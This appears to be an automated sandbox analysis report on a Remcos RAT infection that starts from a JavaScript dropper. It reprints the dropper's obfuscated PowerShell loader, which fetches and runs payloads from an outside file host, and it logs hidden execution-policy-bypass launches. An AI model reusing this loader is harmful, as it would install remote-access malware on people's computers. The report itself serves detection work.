              Source: unknownHTTPS traffic detected: 23.186.113.60:443 -> 192.168.2.17:60226 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 64.235.43.128:443 -> 192.168.2.17:60227 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.17:60229 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 23.186.113.60:443 -> 192.168.2.17:60230 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.17:60232 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 23.186.113.60:443 -> 192.168.2.17:60233 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 64.235.43.128:443 -> 192.168.2.17:60234 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.17:60248 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.17:60249 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.17:60270 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.17:60271 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.17:60273 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.17:60279 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 151.101.1.91:443 -> 192.168.2.17:60283 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.17:60284 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.17:60289 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.17:60291 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.17:60290 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.17:60294 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.17:60295 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.17:60313 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.17:60315 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.17:60312 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.17:60310 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.17:60314 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.17:60311 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.17:60317 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.17:60318 version: TLS 1.2
              Source: Yara matchFile source: 00000053.00000002.2233264919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

              E-Banking Fraud

              barindex
              Yara detected Remcos RAT
              Source: Yara matchFile source: 00000053.00000002.2233264919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000053.00000002.2258901660.0000000001397000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: 00000053.00000002.2233264919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000053.00000002.2233264919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 00000053.00000002.2233264919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Windows Scripting host queries suspicious COM object (likely to drop second stage)
              Source: C:\Windows\System32\wscript.exeCOM Object queried: Shell Automation Service HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{13709620-C279-11CE-A49E-444553540000}
              Wscript starts Powershell (via cmd or directly)
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $WgkXZ = 'JA' + [char]66 + 'MAFQAaw' + [char]66 + 'aAFoAIAA9ACAAJA' + [char]66 + 'oAG8Acw' + [char]66 + '0AC4AVg' + [char]66 + 'lAHIAcw' + [char]66 + 'pAG8AbgAuAE0AYQ' + [char]66 + 'qAG8AcgAuAEUAcQ' + [char]66 + '1AGEAbA' + [char]66 + 'zACgAMgApADsASQ' + [char]66 + 'mACAAKAAgACQATA' + [char]66 + 'UAGsAWg' + [char]66 + 'aACAAKQAgAHsAJA' + [char]66 + 'mAGIASw' + [char]66 + 'OAFkAIAA9ACAAKA' + [char]66 + 'bAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4ASQ' + [char]66 + 'PAC4AUA' + [char]66 + 'hAHQAaA' + [char]66 + 'dADoAOg' + [char]66 + 'HAGUAdA' + [char]66 + 'UAGUAbQ' + [char]66 + 'wAFAAYQ' + [char]66 + '0AGgAKAApACkAOw' + [char]66 + 'kAGUAbAAgACgAJA' + [char]66 + 'mAGIASw' + [char]66 + 'OAFkAIAArACAAJw' + [char]66 + 'cAFUAcA' + [char]66 + '3AGkAbgAuAG0Acw' + [char]66 + '1ACcAKQA7ACQAbg' + [char]66 + 'nAHMAZA' + [char]66 + 'wACAAPQAgACcAaA' + [char]66 + '0AHQAcA' + [char]66 + 'zADoALwAvAGYAaQ' + [char]66 + 'sAGUAcwAuAGMAYQ' + [char]66 + '0AGIAbw' + [char]66 + '4AC4AbQ' + [char]66 + 'vAGUALw' + [char]66 + 'zAGEAaw' + [char]66 + '1AHUAbwAuAG0Acw' + [char]66 + '1ACcAOwAkAG0AZQ' + [char]66 + 'uAG8AcwAgAD0AIAAnAGgAdA' + [char]66 + '0AHAAcwA6AC8ALw' + [char]66 + 'mAGkAbA' + [char]66 + 'lAHMALg' + [char]66 + 'jAGEAdA' + [char]66 + 'iAG8AeAAuAG0Abw' + [char]66 + 'lAC8ANg' + [char]66 + 'zAGQAag' + [char]66 + 'jADUALg' + [char]66 + 'tAHMAdQAnADsAJA' + [char]66 + 'FAGgAZw' + [char]66 + 'WAHcAIAA9ACAAJA' + [char]66 + 'lAG4AdgA6AFAAUg' + [char]66 + 'PAEMARQ' + [char]66 + 'TAFMATw' + [char]66 + 'SAF8AQQ' + [char]66 + 'SAEMASA' + [char]66 + 'JAFQARQ' + [char]66 + 'DAFQAVQ' + [char]66 + 'SAEUALg' + [char]66 + 'DAG8Abg' + [char]66 + '0AGEAaQ' + [char]66 + 'uAHMAKAAnADYANAAnACkAOw' + [char]66 + 'pAGYAIAAoACAAJA' + [char]66 + 'FAGgAZw' + [char]66 + 'WAHcAIAApACAAewAkAG4AZw' + [char]66 + 'zAGQAcAAgAD0AIAAkAG0AZQ' + [char]66 + 'uAG8AcwAgADsAfQ' + [char]66 + 'lAGwAcw' + [char]66 + 'lACAAewAkAG4AZw' + [char]66 + 'zAGQAcAAgAD0AIAAoACQAbg' + [char]66 + 'nAHMAZA' + [char]66 + 'wACkAIAA7AH0AOwAkAHkAaw' + [char]66 + 'oAHkAbgAgAD0AIAAoACAATg' + [char]66 + 'lAHcALQ' + [char]66 + 'PAGIAag' + [char]66 + 'lAGMAdAAgAE4AZQ' + [char]66 + '0AC4AVw' + [char]66 + 'lAGIAQw' + [char]66 + 'sAGkAZQ' + [char]66 + 'uAHQAIAApACAAOwAkAHkAaw' + [char]66 + 'oAHkAbgAuAEUAbg' + [char]66 + 'jAG8AZA' + [char]66 + 'pAG4AZwAgAD0AIA' + [char]66 + 'bAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4AVA' + [char]66 + 'lAHgAdAAuAEUAbg' + [char]66 + 'jAG8AZA' + [char]66 + 'pAG4AZw' + [char]66 + 'dADoAOg' + [char]66 + 'VAFQARgA4ACAAOwAkAHkAaw' + [char]66 + 'oAHkAbgAuAEQAbw' + [char]66 + '3AG4AbA' + [char]66 + 'vAGEAZA' + [char]66 + 'GAGkAbA' + [char]66 + 'lACgAJA' + [char]66 + 'uAGcAcw' + [char]66 + 'kAHAALAAgACgAJA' + [char]66 + 'mAGIASw' + [char]66 + 'OAFkAIAArACAAJw' + [char]66 + 'cAFUAcA' + [char]66 + '3AGkAbgAuAG0Acw' + [char]66 + '1ACcAKQAgACkAIAA7ACQAZg' + [char]66 + 'WAEQA
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $WgkXZ = 'JA' + [char]66 + 'MAFQAaw' + [char]66 + 'aAFoAIAA9ACAAJA' + [char]66 + 'oAG8Acw' + [char]66 + '0AC4AVg' + [char]66 + 'lAHIAcw' + [char]66 + 'pAG8AbgAuAE0AYQ' + [char]66 + 'qAG8AcgAuAEUAcQ' + [char]66 + '1AGEAbA' + [char]66 + 'zACgAMgApADsASQ' + [char]66 + 'mACAAKAAgACQATA' + [char]66 + 'UAGsAWg' + [char]66 + 'aACAAKQAgAHsAJA' + [char]66 + 'mAGIASw' + [char]66 + 'OAFkAIAA9ACAAKA' + [char]66 + 'bAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4ASQ' + [char]66 + 'PAC4AUA' + [char]66 + 'hAHQAaA' + [char]66 + 'dADoAOg' + [char]66 + 'HAGUAdA' + [char]66 + 'UAGUAbQ' + [char]66 + 'wAFAAYQ' + [char]66 + '0AGgAKAApACkAOw' + [char]66 + 'kAGUAbAAgACgAJA' + [char]66 + 'mAGIASw' + [char]66 + 'OAFkAIAArACAAJw' + [char]66 + 'cAFUAcA' + [char]66 + '3AGkAbgAuAG0Acw' + [char]66 + '1ACcAKQA7ACQAbg' + [char]66 + 'nAHMAZA' + [char]66 + 'wACAAPQAgACcAaA' + [char]66 + '0AHQAcA' + [char]66 + 'zADoALwAvAGYAaQ' + [char]66 + 'sAGUAcwAuAGMAYQ' + [char]66 + '0AGIAbw' + [char]66 + '4AC4AbQ' + [char]66 + 'vAGUALw' + [char]66 + 'zAGEAaw' + [char]66 + '1AHUAbwAuAG0Acw' + [char]66 + '1ACcAOwAkAG0AZQ' + [char]66 + 'uAG8AcwAgAD0AIAAnAGgAdA' + [char]66 + '0AHAAcwA6AC8ALw' + [char]66 + 'mAGkAbA' + [char]66 + 'lAHMALg' + [char]66 + 'jAGEAdA' + [char]66 + 'iAG8AeAAuAG0Abw' + [char]66 + 'lAC8ANg' + [char]66 + 'zAGQAag' + [char]66 + 'jADUALg' + [char]66 + 'tAHMAdQAnADsAJA' + [char]66 + 'FAGgAZw' + [char]66 + 'WAHcAIAA9ACAAJA' + [char]66 + 'lAG4AdgA6AFAAUg' + [char]66 + 'PAEMARQ' + [char]66 + 'TAFMATw' + [char]66 + 'SAF8AQQ' + [char]66 + 'SAEMASA' + [char]66 + 'JAFQARQ' + [char]66 + 'DAFQAVQ' + [char]66 + 'SAEUALg' + [char]66 + 'DAG8Abg' + [char]66 + '0AGEAaQ' + [char]66 + 'uAHMAKAAnADYANAAnACkAOw' + [char]66 + 'pAGYAIAAoACAAJA' + [char]66 + 'FAGgAZw' + [char]66 + 'WAHcAIAApACAAewAkAG4AZw' + [char]66 + 'zAGQAcAAgAD0AIAAkAG0AZQ' + [char]66 + 'uAG8AcwAgADsAfQ' + [char]66 + 'lAGwAcw' + [char]66 + 'lACAAewAkAG4AZw' + [char]66 + 'zAGQAcAAgAD0AIAAoACQAbg' + [char]66 + 'nAHMAZA' + [char]66 + 'wACkAIAA7AH0AOwAkAHkAaw' + [char]66 + 'oAHkAbgAgAD0AIAAoACAATg' + [char]66 + 'lAHcALQ' + [char]66 + 'PAGIAag' + [char]66 + 'lAGMAdAAgAE4AZQ' + [char]66 + '0AC4AVw' + [char]66 + 'lAGIAQw' + [char]66 + 'sAGkAZQ' + [char]66 + 'uAHQAIAApACAAOwAkAHkAaw' + [char]66 + 'oAHkAbgAuAEUAbg' + [char]66 + 'jAG8AZA' + [char]66 + 'pAG4AZwAgAD0AIA' + [char]66 + 'bAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4AVA' + [char]66 + 'lAHgAdAAuAEUAbg' + [char]66 + 'jAG8AZA' + [char]66 + 'pAG4AZw' + [char]66 + 'dADoAOg' + [char]66 + 'VAFQARgA4ACAAOwAkAHkAaw' + [char]66 + 'oAHkAbgAuAEQAbw' + [char]66 + '3AG4AbA' + [char]66 + 'vAGEAZA' + [char]66 + 'GAGkAbA' + [char]66 + 'lACgAJA' + [char]66 + 'uAGcAcw' + [char]66 + 'kAHAALAAgACgAJA' + [char]66 + 'mAGIASw' + [char]66 + 'OAFkAIAArACAAJw' + [char]66 + 'cAFUAcA' + [char]66 + '3AGkAbgAuAG0Acw' + [char]66 + '1ACcAKQAgACkAIAA7ACQAZg' + [char]66 + 'WAEQA
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $WgkXZ = 'JA' + [char]66 + 'MAFQAaw' + [char]66 + 'aAFoAIAA9ACAAJA' + [char]66 + 'oAG8Acw' + [char]66 + '0AC4AVg' + [char]66 + 'lAHIAcw' + [char]66 + 'pAG8AbgAuAE0AYQ' + [char]66 + 'qAG8AcgAuAEUAcQ' + [char]66 + '1AGEAbA' + [char]66 + 'zACgAMgApADsASQ' + [char]66 + 'mACAAKAAgACQATA' + [char]66 + 'UAGsAWg' + [char]66 + 'aACAAKQAgAHsAJA' + [char]66 + 'mAGIASw' + [char]66 + 'OAFkAIAA9ACAAKA' + [char]66 + 'bAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4ASQ' + [char]66 + 'PAC4AUA' + [char]66 + 'hAHQAaA' + [char]66 + 'dADoAOg' + [char]66 + 'HAGUAdA' + [char]66 + 'UAGUAbQ' + [char]66 + 'wAFAAYQ' + [char]66 + '0AGgAKAApACkAOw' + [char]66 + 'kAGUAbAAgACgAJA' + [char]66 + 'mAGIASw' + [char]66 + 'OAFkAIAArACAAJw' + [char]66 + 'cAFUAcA' + [char]66 + '3AGkAbgAuAG0Acw' + [char]66 + '1ACcAKQA7ACQAbg' + [char]66 + 'nAHMAZA' + [char]66 + 'wACAAPQAgACcAaA' + [char]66 + '0AHQAcA' + [char]66 + 'zADoALwAvAGYAaQ' + [char]66 + 'sAGUAcwAuAGMAYQ' + [char]66 + '0AGIAbw' + [char]66 + '4AC4AbQ' + [char]66 + 'vAGUALw' + [char]66 + 'zAGEAaw' + [char]66 + '1AHUAbwAuAG0Acw' + [char]66 + '1ACcAOwAkAG0AZQ' + [char]66 + 'uAG8AcwAgAD0AIAAnAGgAdA' + [char]66 + '0AHAAcwA6AC8ALw' + [char]66 + 'mAGkAbA' + [char]66 + 'lAHMALg' + [char]66 + 'jAGEAdA' + [char]66 + 'iAG8AeAAuAG0Abw' + [char]66 + 'lAC8ANg' + [char]66 + 'zAGQAag' + [char]66 + 'jADUALg' + [char]66 + 'tAHMAdQAnADsAJA' + [char]66 + 'FAGgAZw' + [char]66 + 'WAHcAIAA9ACAAJA' + [char]66 + 'lAG4AdgA6AFAAUg' + [char]66 + 'PAEMARQ' + [char]66 + 'TAFMATw' + [char]66 + 'SAF8AQQ' + [char]66 + 'SAEMASA' + [char]66 + 'JAFQARQ' + [char]66 + 'DAFQAVQ' + [char]66 + 'SAEUALg' + [char]66 + 'DAG8Abg' + [char]66 + '0AGEAaQ' + [char]66 + 'uAHMAKAAnADYANAAnACkAOw' + [char]66 + 'pAGYAIAAoACAAJA' + [char]66 + 'FAGgAZw' + [char]66 + 'WAHcAIAApACAAewAkAG4AZw' + [char]66 + 'zAGQAcAAgAD0AIAAkAG0AZQ' + [char]66 + 'uAG8AcwAgADsAfQ' + [char]66 + 'lAGwAcw' + [char]66 + 'lACAAewAkAG4AZw' + [char]66 + 'zAGQAcAAgAD0AIAAoACQAbg' + [char]66 + 'nAHMAZA' + [char]66 + 'wACkAIAA7AH0AOwAkAHkAaw' + [char]66 + 'oAHkAbgAgAD0AIAAoACAATg' + [char]66 + 'lAHcALQ' + [char]66 + 'PAGIAag' + [char]66 + 'lAGMAdAAgAE4AZQ' + [char]66 + '0AC4AVw' + [char]66 + 'lAGIAQw' + [char]66 + 'sAGkAZQ' + [char]66 + 'uAHQAIAApACAAOwAkAHkAaw' + [char]66 + 'oAHkAbgAuAEUAbg' + [char]66 + 'jAG8AZA' + [char]66 + 'pAG4AZwAgAD0AIA' + [char]66 + 'bAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4AVA' + [char]66 + 'lAHgAdAAuAEUAbg' + [char]66 + 'jAG8AZA' + [char]66 + 'pAG4AZw' + [char]66 + 'dADoAOg' + [char]66 + 'VAFQARgA4ACAAOwAkAHkAaw' + [char]66 + 'oAHkAbgAuAEQAbw' + [char]66 + '3AG4AbA' + [char]66 + 'vAGEAZA' + [char]66 + 'GAGkAbA' + [char]66 + 'lACgAJA' + [char]66 + 'uAGcAcw' + [char]66 + 'kAHAALAAgACgAJA' + [char]66 + 'mAGIASw' + [char]66 + 'OAFkAIAArACAAJw' + [char]66 + 'cAFUAcA' + [char]66 + '3AGkAbgAuAG0Acw' + [char]66 + '1ACcAKQAgACkAIAA7ACQAZg' + [char]66 + 'WAEQA
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden Start-Sleep -Seconds 1 ; powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -file 'C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\oqesy.ps1'
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden Start-Sleep -Seconds 1 ; powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -file 'C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\wbhes.ps1'
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden Start-Sleep -Seconds 1 ; powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -file 'C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\vogrr.ps1'
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden Start-Sleep -Seconds 1 ; powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -file 'C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\qdnjv.ps1'
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -file "C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\oqesy.ps1"
              Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 16227
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 2755
              Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 16227
              Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 16227
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 2755
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 2755
              Source: 00000053.00000002.2233264919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 00000053.00000002.2233264919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 00000053.00000002.2233264919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: classification engineClassification label: mal100.spre.troj.expl.evad.win@104/83@98/263
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5568:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mgvhkobh.xwg.ps1
              Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.ini
              Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
              Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2096 --field-trial-handle=1908,i,1253837346360895755,7598481628493044316,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
              Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://drive.google.com/file/d/1FVDnmU54G6_GaADSmojqRgpCVK0Y1U9s/view?usp=sharing"
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2096 --field-trial-handle=1908,i,1253837346360895755,7598481628493044316,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
              Source: unknownProcess created: C:\Program Files\7-Zip\7zG.exe "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\user\Downloads\F-2025-0855\" -spe -an -ai#7zMap30307:86:7zEvent17416
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Downloads\F-2025-0855\F-2025-0855.js"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $WgkXZ = 'JA' + [char]66 + 'MAFQAaw' + [char]66 + 'aAFoAIAA9ACAAJA' + [char]66 + 'oAG8Acw' + [char]66 + '0AC4AVg' + [char]66 + 'lAHIAcw' + [char]66 + 'pAG8AbgAuAE0AYQ' + [char]66 + 'qAG8AcgAuAEUAcQ' + [char]66 + '1AGEAbA' + [char]66 + 'zACgAMgApADsASQ' + [char]66 + 'mACAAKAAgACQATA' + [char]66 + 'UAGsAWg' + [char]66 + 'aACAAKQAgAHsAJA' + [char]66 + 'mAGIASw' + [char]66 + 'OAFkAIAA9ACAAKA' + [char]66 + 'bAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4ASQ' + [char]66 + 'PAC4AUA' + [char]66 + 'hAHQAaA' + [char]66 + 'dADoAOg' + [char]66 + 'HAGUAdA' + [char]66 + 'UAGUAbQ' + [char]66 + 'wAFAAYQ' + [char]66 + '0AGgAKAApACkAOw' + [char]66 + 'kAGUAbAAgACgAJA' + [char]66 + 'mAGIASw' + [char]66 + 'OAFkAIAArACAAJw' + [char]66 + 'cAFUAcA' + [char]66 + '3AGkAbgAuAG0Acw' + [char]66 + '1ACcAKQA7ACQAbg' + [char]66 + 'nAHMAZA' + [char]66 + 'wACAAPQAgACcAaA' + [char]66 + '0AHQAcA' + [char]66 + 'zADoALwAvAGYAaQ' + [char]66 + 'sAGUAcwAuAGMAYQ' + [char]66 + '0AGIAbw' + [char]66 + '4AC4AbQ' + [char]66 + 'vAGUALw' + [char]66 + 'zAGEAaw' + [char]66 + '1AHUAbwAuAG0Acw' + [char]66 + '1ACcAOwAkAG0AZQ' + [char]66 + 'uAG8AcwAgAD0AIAAnAGgAdA' + [char]66 + '0AHAAcwA6AC8ALw' + [char]66 + 'mAGkAbA' + [char]66 + 'lAHMALg' + [char]66 + 'jAGEAdA' + [char]66 + 'iAG8AeAAuAG0Abw' + [char]66 + 'lAC8ANg' + [char]66 + 'zAGQAag' + [char]66 + 'jADUALg' + [char]66 + 'tAHMAdQAnADsAJA' + [char]66 + 'FAGgAZw' + [char]66 + 'WAHcAIAA9ACAAJA' + [char]66 + 'lAG4AdgA6AFAAUg' + [char]66 + 'PAEMARQ' + [char]66 + 'TAFMATw' + [char]66 + 'SAF8AQQ' + [char]66 + 'SAEMASA' + [char]66 + 'JAFQARQ' + [char]66 + 'DAFQAVQ' + [char]66 + 'SAEUALg' + [char]66 + 'DAG8Abg' + [char]66 + '0AGEAaQ' + [char]66 + 'uAHMAKAAnADYANAAnACkAOw' + [char]66 + 'pAGYAIAAoACAAJA' + [char]66 + 'FAGgAZw' + [char]66 + 'WAHcAIAApACAAewAkAG4AZw' + [char]66 + 'zAGQAcAAgAD0AIAAkAG0AZQ' + [char]66 + 'uAG8AcwAgADsAfQ' + [char]66 + 'lAGwAcw' + [char]66 + 'lACAAewAkAG4AZw' + [char]66 + 'zAGQAcAAgAD0AIAAoACQAbg' + [char]66 + 'nAHMAZA' + [char]66 + 'wACkAIAA7AH0AOwAkAHkAaw' + [char]66 + 'oAHkAbgAgAD0AIAAoACAATg' + [char]66 + 'lAHcALQ' + [char]66 + 'PAGIAag' + [char]66 + 'lAGMAdAAgAE4AZQ' + [char]66 + '0AC4AVw' + [char]66 + 'lAGIAQw' + [char]66 + 'sAGkAZQ' + [char]66 + 'uAHQAIAApACAAOwAkAHkAaw' + [char]66 + 'oAHkAbgAuAEUAbg' 